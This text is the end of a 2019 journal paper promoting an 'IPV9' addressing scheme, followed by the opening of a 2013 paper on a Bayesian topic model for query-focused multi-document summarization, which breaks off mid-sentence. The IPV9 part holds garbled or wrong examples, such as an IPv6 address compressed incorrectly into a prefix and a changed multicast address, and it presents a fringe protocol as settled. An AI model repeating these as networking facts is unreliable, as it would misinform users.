represents a 16-bit value and is hexadecimal, separated by a colon. For example: “3FFE:FFFF:7654:FEDA:1245:BA98:3210:4562”. 2) Compressed form Writing a long string of zeros can be simplified using a compressed form, where a single contiguous sequence of zeros is represented by a double colon, “: : ”.This symbol can only appear once in an address. For example, the local link unicast address FE80:0:0:0:0:0:0:10 is shortened as“FE80::/10”, and the multicast address FFDE:0:0:0:0:0:0:101 is shortened as “FFED::101”.Loop address 0:0:0:0:0:0:0:1compression form “::1”. An unspecified address 0:0:0:0:0:0:0:0 is shortened as “::”. 3) Mixed form This form combines IPv4 and IPv6 addresses. In this case, the address format is “n:n:n:n:n:n:d.d.d.d”. Where each “n” represents the 16-bit value of the IPv6 address and is represented in hexadecimal, and each “d” represents the 8-bit value of the IPv4 address and is represented in decimal. C. Transition from IPv4 to IPv6 The transition from IPv4 to IPv6 can only be done incrementally, because the number of routers using IPv4 across the Internet is so large that it is impractical to set a cut-off point to upgrade the system. There is also backward compatibility when installing a new IPv6 system.IPv6 system must be able to complete the IPv4 system to receive, forward IP datagram and routing selection. Here are three strategies for transitioning to IPV6: 1) Dual stack Prior to the full transition to IPv6, there were stacks of IPv4 and IPv6 on some hosts or routers. Dual stack hosts or routers can communicate with both IPv4 and IPv6 systems. 2) Tunneling The point of this technique is that the IPv6 datagram is disguised as an IPv4 datagram, and the entire IPv6 datagram becomes the data portion of the IPv4 datagram. This allows unimpeded access to the IPv4 network and, upon leaving the IPv4 network, transfers the data portion of the IPv4 datagram to the host’s IPv6 protocol stack.IPv6 datagram is submitted to the IPv6 protocol stack to complete the communication. 3) Network address conversion/protocol conversion technology Network Address Translation/Protocol Translation technology NAT-PT (Network Address Translation - Protocol Translation) is combined with SIIT Protocol Translation, dynamic Address Translation (NAT) under traditional IPv4 and appropriate application layer gateway (ALG).It enables communication between International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 54 hosts with only IPv6 installed and most applications with only IPv4 machines installed. IV. THE RESEARCH STATUS OF IPV4 AND IPV6 A. Current status of IPv4 Due to the allocation of IPv4 addresses adopts the principle of "first come, first served, distributed according to needs", the uneven distribution makes the address allocation has a huge loophole, which makes many countries and regions have insufficient IP address resources. With the development of Internet, especially the explosive growth of scale, some inherent defects of IPv4 are gradually exposed, mainly focusing on address exhaustion, rapid expansion of routing table to the bottleneck, security and service quality is difficult to guarantee, and serious waste of IPv4 address structure. The design of IPv4 protocol does not consider the real-time transmission of audio stream and video stream.IPv4 does not provide encryption and authentication mechanisms, so the secure transmission of confidential data resources cannot be guaranteed. B. Current status of IPv6 Due to the limitations of the technology era, there are many defects in the design idea of the address structure of IPv6.The richness of the IPv6128 bit address length makes it more than just a matter of extending the address. Instead of following the principle of transparency between different protocol layers, IP addresses, which should belong to the protocol of the network layer, are mixed with physical layer addresses and application layer, resulting in a series of fatal consequences. V. IPV9 ADDRESS CODE IPV9 not only expands the length of IP address, but also makes the network support more address levels. In addition, the method of address coding method of the variable-length and variable-position is adopted, and the parsing link is cancelled. The formal text representation method used by human is directly converted into machine language, which actually reduces the overhead of network. A. IPV9 header format IPV9 header format design is shown in figure 7. Figure 7. Header format of IPV9 Figure 7 design explanation is as follows: 1) Version. It has a length of four bits. Internet protocol version number, for IPV9, this field must be 9. 2) Traffic Class. It has a length of 8 bits. The three bits high are used to specify the length of the address, and the value is 0 to 7, which is the power of 2.The address length is 1Byte ~ 128Byte.The default value is 256 bits, where 0 is 16 bits, 1 is 32 bits, 2 is 64 bits, 3 is 128 bits, 4 is 256 bits, 5 is 512 bits, 6 is 1024 bits, International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 55 and 7 is 2048 bits. The last five bits specify the communication class and authentication for the source and destination addresses.0 through 15 are the priority values, where 0 through 5 are used to specify the priority class for the traffic.6 through 7 are used to specify a communication method for authentication before communication, which is used by the packet sender for traffic control and whether authentication of source and destination addresses is required.8 through 14 are used to specify absolute traffic that will not fall back when congestion is encountered.15 for virtual circuits.16 and 17 respectively assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. The other values are reserved for future use. 3) Flow Label. It is 20 bits long and is used to identify packages that belong to the same business flow. 4) Payload Length. It has a length of 16 bits, including the net payload of bytes, which is the number of bytes contained in the packet behind the IPV9 header. 5) Next Header. Its length is 8 bits, and this field indicates the protocol type in the field following the IPV9 header. 6) Hop Limit. Its length is 8 bits, and this field is subtracted by one each time a node forwards a packet. 7) Source address. Its length is 8 bit ~ 2048 bit; specify IPV9 packet sender address, using variable length and location method. 8) Destination address. Its length is 8 bit ~ 2048 bit, and the destination address of IPV9 packet is specified. 9) Time. It is used to control the lifetime of the address in the header. 10) Identification code. It identifies the authenticity of the address in the header. B. Text representation of IPV9 addresses This paper has developed a unified method to represent IPV9 address, including "bracket decimal", "curly braces decimal" and "parentheses bracket". 1) Bracket decimal The bracket decimal can be expressed in the following two ways: Method 1: use "[]" when the length is 2048 bits. Where, the parentheses are expressed in decimal notation, and the length can be written in indefinite length. Method 2: length 256 able address in the form of representation is "y[y] [y] [y] [y] [y] [y]", where each y represents the address as a 32 bit part, and used the decimal representation. Because 232 = 4294967296. Each "y" represents a 32 bits portion of the address and is represented in decimal. The difference in decimal number of each of the range is 0 to 9, such as the first digit from left the range is 0 ~ 4, so you don't have the phenomenon of overflow. 2) Curly braces decimal This method divides the 256-bit address into four 64-bit decimal Numbers represented by curly braces separating them. The representation is "Z}Z}Z}Z", where each Z represents a 64-bit portion of the address and is represented in decimal. It's exactly the same as Y, but it's also compatible with Y, so you can mix the two. This approach makes it very convenient for IPv4 addresses to be compatible in IPV9.Such as: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]J.J.J.J; 3) Bracketed notation International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 56 Since IPV9 has an address length of 256 bits, whether you use four or eight segments, there are still many bits in each segment. For example: ...]00000000000000000000000000110100]... ...]01011111111111111111111111111111]... The above situation input cumbersome, prone to errors. For convenience, the parenthesis notation -- (K/L) is introduced. Where "K" means 0 or 1 and "L" means the number of 0 or 1.In this way, the above two examples can be abbreviated as: ...](0/26) of 110100]... ...]010 (1/29)]... 4) Text representation of address prefixes The IPV9 address scheme is similar to the CIDR (unclassified addressing) scheme of IPv4 in that the address prefix is used to represent the network hierarchy. On the representation of IPV9 address prefix, a representation similar to CIDR is adopted, whose form is as follows: IPV9 address/address prefixes length For example, Address prefix 1706[0[0[0[210[22[0 of 200 bits can be expressed as: 1706[0[0[0[210[22[0[0/200 5) IPV9 address type c) Pure IPV9 address The form is Y[Y[Y[Y[Y[Y[Y[Y Each “Y” represents a decimal integer from 0 to 232 =4294967296. d) IPV9 addresses compatible with IPv4 The form is: Y[Y[Y[Y[Y[Y[Y[D.D.D.D Each “Y” represents a decimal integer from 0 to 232 =4294967296. “D” represents a decimal integer between 0 and 255 from the original IPv4. e) IPV9 addresses compatible with Ipv6 The form is: Y[Y[Y[Y[X:X:X:X:X:X:X:X Each “Y” represents a decimal integer from 0 to 232 =4294967296.The “X” represents a hexadecimal number that originally Ipv6 ranged from 0000 to FFFF. f) Special compatibility address In order to guarantee the research results of IPv4 and Ipv6, IPV9 has designed some compatible addresses. The new compatibility address design idea is in this part of the address with the appropriate prefix form. In order to make their representation more convenient and ensure accuracy, the following abbreviations were introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d Where, each y represents the address as 32 bits, represented by decimal; Each “x” represents the original Ipv6 address of 16 bits, in hexadecimal; Each “d” represents the original IPv4 address of 8 bits, in decimal notation. g) [] full decimal address In order to facilitate the application of logistics code and full decimal address. Category number 5 is recommended. In the power of 10 to the power of 512, fixed length positioning method is adopted according to application needs. h) IPV9 address for transitional period IPV9 is compatible with IPv4 and IPv6 technical protocols for the Internet, but IPv4 and IPv6 technical protocols are not compatible with IPV9 in reverse. C. IPv4 and IPv6 transition to IPV9 In order to solve the IPv4 flat to IPV9 transition, special design IPV9 transition address. Transitioning IPv4 to a 232 address in the IPV9 address allows a small change to the current system to complete the transition. In IPV9, there is a section of J.J.J.J address, where each “J” represents a decimal number from 0 to 28 (0~255), where the preceding [7] can be omitted in the middle of the local address, that is, local users (or designated users) can use J.J.J.J directly, which is different from the original IPv4 D.D.D.D. At the same time, this part of the user in order to smooth the International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 57 transition to full decimal can be allocated at the same time decimal. In order to improve the software and hardware in the future, there is no need to re-address, such as [7]741852963 can be written into [7]44.55.199.35 can be directly used in a local IP network to write 44.55.199.35, so that the original terminal can be used. Interim IPV9 address system can be modified to the original IPv4 system. The IPv4 header is also used, but the version number is 9 to distinguish the original IPv4.However, users may use the original terminal equipment within the territory. IPV9 Header TCP/UDP Header data IPv4 Header IPV9 Header TCP/UDP Header data IPV9 Header TCP/UDP Header data Raw IPV9 datagrams The IPV9 header encapsulates the IPv4 header in the tunnel IPV9 datagrams restored through the tunnel IPV9 Host-1 IPv4/IPV9 Tunnel ROuter-R1 IPv4 Router-1 IPv4 Router-2 IPv4/IPV9 Tunnel ROuter-R2 IPV9 Host-2 Internet[IPv4] Figure 8. IPV9 is IPv4 compatible Figure 8 above means that it is possible to build the IPV9 backbone, provide application services and gradually upgrade the backbone network to IPV9 without affecting or modifying the existing terminal IPv4 applications.IPV9 inherited and transplanted most of the application functions on the existing IPv4 Internet, and successfully solved the development problem of IPV9 online application functions. Most of the existing Internet application functions can be copied to the IPV9 network, and began to enter the practical stage. At the same time, the application of IPV9 will continue to innovate and develop. D. Support IPV9 device working mode In the decimal network working group of scientific research, the current IPV9 support devices are ipv9-100m WIFI router, ipv9-1000m WI-FI router, ipv9-10000m router, ipv9-100g router, ipv9-linux client and ipv9-windows client. The IPV9 router network interface types include ordinary Ethernet interface, 4to9 interface (convert IPv4 packets into IPV9 packets according to custom mapping rules), 9to4 interface (convert IPV9 packets into IPv4 packets according to custom mapping rules) and sit interface (realize IPV9 data packets to be transmitted in the current IPv4 network. Implement 9over4, where IPV9 data over is the data portion of the IPv4 packet. The following takes IPV9 100/1000m WIFI router as an example to explain its working mode VPN. Under the VPN mode, most configuration of the router is completed by the background server, which is divided into IPv4 mode and IPV9 mode. In IPv4 mode, the router runs the NAT module, and the client (IPv4) accesses the Internet network in the same way as other IPv4 routers. When the client accesses the server in IPV9 backbone network, the VPN server will communicate with it. Although the pure IPV9 client is not supported in this mode, the communication between the client of WIFI router A and the client of WIF router B is supported. The data flow diagram is shown in figure 9 below: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 58 (a) one-way access between IPv4 of VPN tunnel and Beijing backbone node (b) IPv4 reciprocal visits within the VPN tunnel Figure 9. (a) one-way access between IPv4 of VPN tunnel and Beijing backbone node; (b) IPv4 reciprocal visits within the VPN tunnel International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 59 In IPV9 mode, clients (IPv4) access the Internet network in the same way as other IPv4 routers. This mode supports the pure IPV9 client, but does not support the communication between the client of WIFI router A and the client of WIF router B, as shown in data flow figure 10. (a) IPV9 exchange visits between VPN tunnel and Beijing backbone node (b) IPV9 mutual visits within the VPN tunnel Figure 10. (a) IPV9 exchange visits between VPN tunnel and Beijing backbone node; (b) IPV9 mutual visits within the VPN tunnel International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 60 To sum up, IPV9 inherits most functions on the existing Internet. In the protection of IPv4 and IPv6 research results, address expansion, security verification and other operations. This makes IPV9 more competitive in the development of the Internet, and its functions will continue to develop with the development of technology. VI. SUMMARIZES Although the use of NAT (" network address translation "), CIDR (" classless inter-domain routing ") and other technologies can alleviate the IPv4 crisis to some extent. However, this does not fundamentally solve the problem, and at the same time, it will bring about new problems in cost, service quality, safety and other aspects, but create greater challenges. But the new generation network layer protocol IPv6 itself also has the corresponding question, causes it not to have the Omni-directional. In this situation, a new network will come into being, which not only represents the progress of people's technology, but also symbolizes people's dedication to new technology. This paper mainly designs and researches the new network address coding, compares the IPv4 and IPv6 address coding, and proposes a new address coding. This method solves the problem of address exhaustion thoroughly, and puts forward the theory of verification before communication, which solves the problems of current network address exhaustion and information security. It also describes the ipv9-compatible IPv4 working mode, which guarantees the existing research results, provides some new design ideas for new network addresses, and promotes the development of new network addresses. REFERENCES [1] RFC - Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791, 1981.09. [2] S. Deering, R. Hinden, Network Working Group.Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [3] M. Crawford. Network Working Group.Transmission of IPv6 Packets over Ethernet Networks.RFC-2464, 1998.12. [4] J. Onions, Network Working Group.A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [5] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. [6] Information technology-FutureNetwork-Problem statement and requirement-Part 5: Security, ISO/IEC DTR 29181-5,2014,12. [7] Wang Wenfeng, Xie Jianping,etc.Product and servicedigital identification format for information procession.SJ/T11603-2016, 2016.06. [8] S. Deering, R. Hinden, Internet Protocol, Version 6 (IPv6)-Specification, Network Working Group. RFC-1883, 1995.12. work_27d5tr326feydgcx32t4nhl424 ---- Transactions of the Association for Computational Linguistics, 1 (2013) 89–98. Action Editor: Noah Smith. Submitted 12/2012; Published 5/2013. c©2013 Association for Computational Linguistics. A Novel Feature-based Bayesian Model for Query Focused Multi-document Summarization Jiwei Li School of Computer Science Carnegie Mellon University bdlijiwei@gmail.com Sujian Li Laboratory of Computational Linguistics Peking University lisujian@pku.edu.cn Abstract Supervised learning methods and LDA based topic model have been successfully applied in the field of multi-document summarization. In this paper, we propose a novel supervised approach that can in- corporate rich sentence features into Bayesian topic models in a principled way, thus taking advantages of both topic model and feature based supervised learn- ing methods. Experimental results on DUC2007, TAC2008 and TAC2009 demonstrate the effective- ness of our approach. 1 Introduction Query-focused multi-document summarization (Nenkova et al., 2006; Wan et al., 2007; Ouyang et al., 2010) can facilitate users to grasp the main idea of documents. In query-focused summarization, a specific topic description, such as a query, which expresses the most important topic information is proposed before the document collection, and a summary would be generated according to the given topic. Supervised models have been widely used in sum- marization (Li, et al., 2009, Shen et al., 2007, Ouyang et al., 2010). Supervised models usually re- gard summarization as a classification or regression problem and use various sentence features to build a classifier based on labeled negative or positive sam- ples. However, existing supervised approaches sel- dom exploit the intrinsic structure among sentences. This disadvantage usually gives rise to serious prob- lems such as unbalance and low recall in summaries. Recently, LDA-based (Blei et al., 2003) Bayesian topic models have widely been applied in multi- document summarization in that Bayesian ap- proaches can offer clear and rigorous probabilis- tic interpretations for summaries(Daume and Marcu, 2006; Haghighi and Vanderwende, 2009; Jin et al., 2010; Mason and Charniak, 2011; Delort and Alfon- seca, 2012). Exiting Bayesian approaches label sen- tences or words with topics and sentences which are closely related with query or can highly generalize documents are selected into summaries. However, LDA topic model suffers from the intrinsic disad- vantages that it only uses word frequency for topic modeling and can not use useful text features such as position, word order etc (Zhu and Xing, 2010). For example, the first sentence in a document may be more important for summary since it is more likely to give a global generalization about the document. It is hard for LDA model to consider such informa- tion, making useful information lost. It naturally comes to our minds that we can im- prove summarization performance by making full use of both useful text features and the latent seman- tic structures from by LDA topic model. One related work is from Celikyilmaz and Hakkani-Tur (2010). They built a hierarchical topic model called Hybh- sum based on LDA for topic discovery and assumed this model can produce appropriate scores for sen- tence evaluation. Then the scores are used for tun- ing the weights of various features that helpful for summary generation. Their work made a good step of combining topic model with feature based super- vised learning. However, what their approach con- fuses us is that whether a topic model only based on word frequency is good enough to generate an appropriate sentence score for regression. Actually, how to incorporate features into LDA topic model has been a open problem. Supervised topic models such as sLDA(Blei and MacAuliffe 2007) give us some inspiration. In sLDA, each document is asso- ciated with a labeled feature and sLDA can integrate such feature into LDA for topic modeling in a prin- 89 cipled way. With reference to the work of supervised LDA models, in this paper, we propose a novel sentence feature based Bayesian model S-sLDA for multi- document summarization. Our approach can natu- rally combine feature based supervised methods and topic models. The most important and challeng- ing problem in our model is the tuning of feature weights. To solve this problem, we transform the problem of finding optimum feature weights into an optimization algorithm and learn these weights in a supervised way. A set of experiments are con- ducted based on the benchmark data of DUC2007, TAC2008 and TAC2009, and experimental results show the effectiveness of our model. The rest of the paper is organized as follows. Sec- tion 2 describes some background and related works. Section 3 describes our details of S-sLDA model. Section 4 demonstrates details of our approaches, including learning, inference and summary gener- ation. Section 5 provides experiments results and Section 6 concludes the paper. 2 Related Work A variety of approaches have been proposed for query-focused multi-document summarizations such as unsupervised (semi-supervised) approaches, supervised approaches, and Bayesian approaches. Unsupervised (semi-supervised) approaches such as Lexrank (Erkan and Radex, 2004), manifold (Wan et al., 2007) treat summarization as a graph- based ranking problem. The relatedness between the query and each sentence is achieved by impos- ing querys influence on each sentence along with the propagation of graph. Most supervised ap- proaches regard summarization task as a sentence level two class classification problem. Supervised machine learning methods such as Support Vector Machine(SVM) (Li, et al., 2009), Maximum En- tropy (Osborne, 2002) , Conditional Random Field (Shen et al., 2007) and regression models (Ouyang et al., 2010) have been adopted to leverage the rich sentence features for summarization. Recently, Bayesian topic models have shown their power in summarization for its clear probabilistic interpretation. Daume and Marcu (2006) proposed Bayesum model for sentence extraction based on query expansion concept in information retrieval. Haghighi and Vanderwende (2009) proposed topic- sum and hiersum which use a LDA-like topic model and assign each sentence a distribution over back- ground topic, doc-specific topic and content topics. Celikyilmaz and Hakkani-Tur (2010) made a good step in combining topic model with supervised fea- ture based regression for sentence scoring in sum- marization. In their model, the score of training sentences are firstly got through a novel hierarchi- cal topic model. Then a featured based support vec- tor regression (SVR) is used for sentence score pre- diction. The problem of Celikyilmaz and Hakkani- Turs model is that topic model and feature based re- gression are two separate processes and the score of training sentences may be biased because their topic model only consider word frequency and fail to con- sider other important features. Supervised feature based topic models have been proposed in recent years to incorporate different kinds of features into LDA model. Blei (2007) proposed sLDA for doc- ument response pairs and Daniel et al. (2009) pro- posed Labeled LDA by defining a one to one corre- spondence between latent topic and user tags. Zhu and Xing (2010) proposed conditional topic random field (CTRF) which addresses feature and indepen- dent limitation in LDA. 3 Model description 3.1 LDA and sLDA The hierarchical Bayesian LDA (Blei et al., 2003) models the probability of a corpus on hidden topics as shown in Figure 1(a). Let K be the number of topics , M be the number of documents in the cor- pus and V be vocabulary size. The topic distribution of each document θm is drawn from a prior Dirichlet distribution Dir(α), and each document word wmn is sampled from a topic-word distribution φz spec- ified by a drawn from the topic-document distribu- tion θm. β is a K×M dimensional matrix and each βk is a distribution over the V terms. The generat- ing procedure of LDA is illustrated in Figure 2. θm is a mixture proportion over topics of document m and zmn is a K dimensional variable that presents the topic assignment distribution of different words. Supervised LDA (sLDA) (Blei and McAuliffe 2007) is a document feature based model and intro- 90 Figure 1: Graphical models for (a) LDA model and (b) sLDA model. 1. Draw a document proportion vector θm|α ∼ Dir(α) 2. For each word in m (a)draw topic assignment zmn|θ ∼ Multi(θzmn ) (b)draw word wmn|zmn,β ∼ Multi(βzmn ) Figure 2: Generation process for LDA duces a response variable to each document for topic discovering, as shown in Figure 1(b). In the gener- ative procedure of sLDA, the document pairwise la- bel is draw from y|−→zm,η,δ2 ∼ p(y|−→zm,η,δ2), where−→zm = 1N ∑N n=1 zm,n. 3.2 Problem Formulation Here we firstly give a standard formulation of the task. Let K be the number of topics, V be the vo- cabulary size and M be the number of documents. Each document Dm is represented with a collection of sentence Dm = {Ss}s=Nms=1 where Nm denotes the number of sentences in mth document. Each sentence is represented with a collection of words {wmsn}n=Nmsn=1 where Nms denotes the number of words in current sentence. −−→ Yms denotes the feature vector of current sentence and we assume that these features are independent. 3.3 S-sLDA zms is the hidden variable indicating the topic of current sentence. In S-sLDA, we make an assump- tion that words in the same sentence are generated from the same topic which was proposed by Gruber (2007). zmsn denotes the topic assignment of cur- rent word. According to our assumption, zmsn = Figure 3: Graph model for S-sLDA model 1. Draw a document proportion vector θm|α ∼ Dir(α) 2. For each sentence in m (a)draw topic assignment zms|θ ∼ Multi(θzmn ) (b)draw feature vector −−→ Yms|zms,η ∼ p( −−→ Yms|zms,η) (c)for each word wmsn in current sentence draw wmsn|zms,β ∼ Multi(βzms ) Figure 4: generation process for S-sLDA zms for any n ∈ [1,Nms]. The generative approach of S-sLDA is shown in Figure 3 and Figure 4. We can see that the generative process involves not only the words within current sentence, but also a series of sentence features. The mixture weights over fea- tures in S-sLDA are defined with a generalized lin- ear model (GLM). p( −−→ Yms|zms,η) = exp(zTmsη) −−→ Yms ∑ zms exp(zTmsη) −−→ Yms (1) Here we assume that each sentence has T features and −−→ Yms is a T × 1 dimensional vector. η is a K × T weight matrix of each feature upon topics, which largely controls the feature generation proce- dure. Unlike s-LDA where η is a latent variable esti- mated from the maximum likelihood estimation al- gorithm, in S-sLDA the value of η is trained through a supervised algorithm which will be illustrated in detail in Section 3. 3.4 Posterior Inference and Estimation Given a document and labels for each sentence, the posterior distribution of the latent variables is: p(θ,z1:N|w1:N,Y,α,β1:K,η) = ∏ m p(θm|α) ∏ s[p(zms|θm)p( −−→ Yms|zms,η) ∏ n p(wmsn|zmsn,βzmsn ]∫ dθp(θm|α) ∑ z ∏ s[p(zms|θm)p( −−→ Yms|zms,η) ∏ n p(wmsn|βzmsn )] (2) Eqn. (2) cannot be efficiently computed. By applying the Jensens inequality, we obtain a lower bound of the log likelihood of document p(θ,z1:N|w1:N, −−→ Yms,α,β1:K,η) ≥ L, where L = ∑ ms E[logP(zms|θ)] + ∑ ms E[logP( −−→ Yms|zms,η)]+ ∑ m E[logP (θ|α)] + ∑ msn E[logP(wmsn|zms,β)] + H(q) (3) 91 where H(q) = −E[logq] and it is the entropy of variational distribution q is defined as q(θ,z|γ,φ) = ∏ mk q(θm|γ) ∏ sn q(zmsn|φms) (4) here γ a K-dimensional Dirichlet parameter vector and multinomial parameters. The first, third and forth terms of Eqn. (3) are identical to the corre- sponding terms for unsupervised LDA (Blei et al., 2003). The second term is the expectation of log probability of features given the latent topic assign- ments. E[logP( −−→ Yms|zms,η)] = E(zms) Tη −−→ Yms − log ∑ zms exp(zTmsη −−→ Yms) (5) where E(zms)T is a 1 × K dimensional vector [φmsk] k=K k=1 . The Bayes estimation for S-sLDA model can be got via a variational EM algorithm. In EM procedure, the lower bound is firstly minimized with respect to γ and φ, and then minimized with α and β by fixing γ and φ. E-step: The updating of Dirichlet parameter γ is identical to that of unsupervised LDA, and does not involve feature vector −−→ Yms. γnewm ← α + ∑ s∈m φs (6) φnewsk ∝ exp{E[logθm|γ] + Nms∑ n=1 E[log(wmsn|β1:K)]+ T∑ t=1 ηktYst} = exp[Ψ(γmk) − Ψ( K∑ k=1 γmk) + T∑ t=1 ηktYst] (7) where Ψ(·) denotes the log Γ function. ms denotes the document that current sentence comes from and Yst denotes the tth feature of sentence s. M-step: The M-step for updating β is the same as the pro- cedure in unsupervised LDA, where the probability of a word generated from a topic is proportional to the number of times this word assigned to the topic. βnewkw = M∑ m=1 Nm∑ s=1 Nms∑ n=1 1(wmsn = w)φ k ms (8) 4 Our Approach 4.1 Learning In this subsection, we describe how we learn the fea- ture weight η in a supervised way. The learning pro- cess of η is a supervised algorithm combined with variational inference of S-sLDA. Given a topic de- scription Q1 and a collection of training sentences S from related documents, human assessors assign a score v(v = −2,−1, 0, 1, 1) to each sentence in S. The score is an integer between −2 (the least desired summary sentences) and +2 (the most desired sum- mary sentences), and score 0 denotes neutral atti- tude. Ov = {ov1,ov2, ...,vvk}(v = −2,−1, 0, 1, 2) is the set containing sentences with score v. Let φQk denote the probability that query is generated from topic k. Since query does not belong to any docu- ment, we use the following strategy to leverage φQk φQk = ∏ w∈Q βkw· 1 M M∑ m=1 exp[Ψ(γmk)−Ψ( K∑ k=1 γmk)] (9) In Equ.(9), ∏ w∈Q βkw denotes the probability that all terms in query are generated from topic k and 1 M ∑M m=1 exp[Ψ(γmk)−Ψ( ∑K k=1 γmk)] can be seen as the average probability that all documents in the corpus are talking about topic k. Eqn. (9) is based on the assumption that query topic is relevant to the main topic discussed by the document corpus. This is a reasonable assumption and most previous LDA summarization models are based on similar as- sumptions. Next, we define φOv,k for sentence set Ov, which can be interpreted as the probability that all sen- tences in collection Ov are generated from topic k. φOv,k = 1 |Ov| ∑ s∈Ov φsk,k ∈ [1,K],v ∈ [−2, 2] (10) |Ov| denotes the number of sentences in set Ov. In- spired by the idea that desired summary sentences would be more semantically related with the query, we transform problem of finding optimum η to the following optimization problem: minηL(η) = v=2∑ v=−2 v ·KL(Ov||Q); T∑ t=1 ηkt = 1 (11) 1We select multiple queries and their related sentences for training 92 where KL(Ov||Q) is the Kullback-Leibler diver- gence between the topic and sentence set Ov as shown in Eqn.(12). KL(Ov||Q) = K∑ k=1 φOvklog φOvk φQk (12) In Eqn. (11), we can see that O2, which contain de- sirable sentences, would be given the largest penalty for its KL divergence from Query. The case is just opposite for undesired set. Our idea is to incorporate the minimization pro- cess of Eqn.(11) into variational inference process of S-sLDA model. Here we perform gradient based optimization method to minimize Eqn.(11). Firstly, we derive the gradient of L(η) with respect to η. ∂L(η) ηxy = v=2∑ v=−2 v · ∂KL(Qv||Q) ∂ηxy (13) ∂KL(Qv||Q) ∂ηxy = K∑ k=1 1 |Qv| (1 + log ∑ s∈Qv |Qv| ) ∑ s∈Qv ∂φsk ∂ηxy − K∑ k=1 1 |Qv| ∑ s∈Qv ∂Qsk ηxy − K∑ k=1 1 Qv ∑ s∈Qvφsk φQk ∂φsk ∂ηxy (14) For simplification, we regard β and γ as constant during updating process of η, so ∂φQk ∂ηxy = 0.2 We can further get first derivative for each labeled sentence. ∂φsk ηxy ∝    Ysyexp[Ψ(γmsi) − Ψ( K∑ k=1 γmsk) + T∑ t=1 ηktYsy] × ∏ w∈s βkw if k = x 0 if k 6= x (15) 4.2 Feature Space Lots of features have been proven to be useful for summarization (Louis et al., 2010). Here we dis- cuss several types of features which are adopted in S-sLDA model. The feature values are either binary or normalized to the interval [0,1]. The following features are used in S-sLDA: Cosine Similarity with query: Cosine similarity is based on the tf-idf value of terms. 2This is reasonable because the influence of γ and β have been embodied in φ during each iteration. Local Inner-document Degree Order: Local Inner document Degree Order is a binary feature which indicates whether Inner-document Degree (IDD) of sentence s is the largest among its neighbors. IDD means the edge number between s and other sen- tences in the same document. Document Specific Word: 1 if a sentence contains document specific word, 0 otherwise. Average Unigram Probability (Nenkova and Van- derwende, 2005; Celikyilmaz and Hakkani-Tur 2010): As for sentence s, p(s) = ∑ w∈s 1 |s|pD(w), where pD(w) is the observed unigram probability in document collection. In addition, we also use the commonly used fea- tures including sentence position, paragraph po- sition, sentence length and sentence bigram fre- quency. E-step initialize φ0sk := 1/K for all i and s. initialize γmi := αmi + N)m/K for all i. initialize ηkt = 0 for all k and t. while not convergence for m = 1 : M update γt+1m according to Eqn.(6) for s = 1 : Nm for k = 1 : K update φt+1sk according to Eqn.(7) normalize the sum of φt+1sk to 1. Minimize L(η) according to Eqn.(11)-(15). M-step: update β according to Eqn.(8) Figure 5: Learning process of η in S-sLDA 4.3 Sentence Selection Strategy Next we explain our sentence selection strategy. Ac- cording to our intuition that the desired summary should have a small KL divergence with query, we propose a function to score a set of sentences Sum. We use a decreasing logistic function ζ(x) = 1/(1+ ex) to refine the score to the range of (0,1). Score(Sum) = ζ(KL(sum||Q)) (16) Let Sum? denote the optimum update summary. We can get Sum? by maximizing the scoring function. Sum? = arg max Sum∈S&&words(Sum)≤L Score(Sum) (17) 93 1. Learning: Given labeled set Ov, learn the feature weight vector η using algorithm in Figure 5. 2. Given new data set and η, use algorithm in section 3.3 for inference. (The only difference between this step and step (1) is that in this step we do not need minimize L(η). 3. Select sentences for summarization from algo- rithm in Figure 6. Figure 6: Summarization Generation by S-sLDA. A greedy algorithm is applied by adding sentence one by one to obtain Sum?. We use G to denote the sentence set containing selected sentences. The algorithm first initializes G to Φ and X to SU. Dur- ing each iteration, we select one sentence from X which maximize Score(sm ∪G). To avoid topic re- dundancy in the summary, we also revise the MMR strategy (Goldstein et al., 1999; Ouyang et al., 2007) in the process of sentence selection. For each sm, we compute the semantic similarity between sm and each sentence st in set Y in Eqn.(18). cos−sem(sm,st) = ∑ k φsmkφstk√∑ k φ 2 smk √∑ k φ 2 stk (18) We need to assure that the value of semantic similar- ity between two sentences is less than Thsem. The whole procedure for summarization using S-sLDA model is illustrated in Figure 6. Thsem is set to 0.5 in the experiments. 5 Experiments 5.1 Experiments Set-up The query-focused multi-document summarization task defined in DUC3(Document Understanding Conference) and TAC4(Text Analysis Conference) evaluations requires generating a concise and well organized summary for a collection of related news documents according to a given query which de- scribes the users information need. The query usually consists of a title and one or more narra- tive/question sentences. The system-generated sum- maries for DUC and TAC are respectively limited to 3http://duc.nist.gov/. 4http://www.nist.gov/tac/. 250 words and 100 words. Our experiment data is composed of DUC 2007, TAC5 2008 and TAC 2009 data which have 45, 48 and 44 collections respec- tively. In our experiments, DUC 2007 data is used as training data and TAC (2008-2009) data is used as the test data. Stop-words in both documents and queries are removed using a stop-word list of 598 words, and the remaining words are stemmed by Porter Stem- mer6. As for the automatic evaluation of summa- rization, ROUGE (Recall-Oriented Understudy for Gisting Evaluation) measures, including ROUGE- 1, ROUGE-2, and ROUGE-SU47 and their corre- sponding 95% confidence intervals, are used to eval- uate the performance of the summaries. In order to obtain a more comprehensive measure of summary quality, we also conduct manual evaluation on TAC data with reference to (Haghighi and Vanderwende, 2009; Celikyilmaz and Hakkani-Tur, 2011; Delort and Alfonseca, 2011). 5.2 Comparison with other Bayesian models In this subsection, we compare our model with the following Bayesian baselines: KL-sum: It is developed by Haghighi and Vanderwende (Lin et al., 2006) by using a KL- divergence based sentence selection strategy. KL(Ps||Qd) = ∑ w P(w)log P(w) Q(w) (19) where Ps is the unigram distribution of candidate summary and Qd denotes the unigram distribution of document 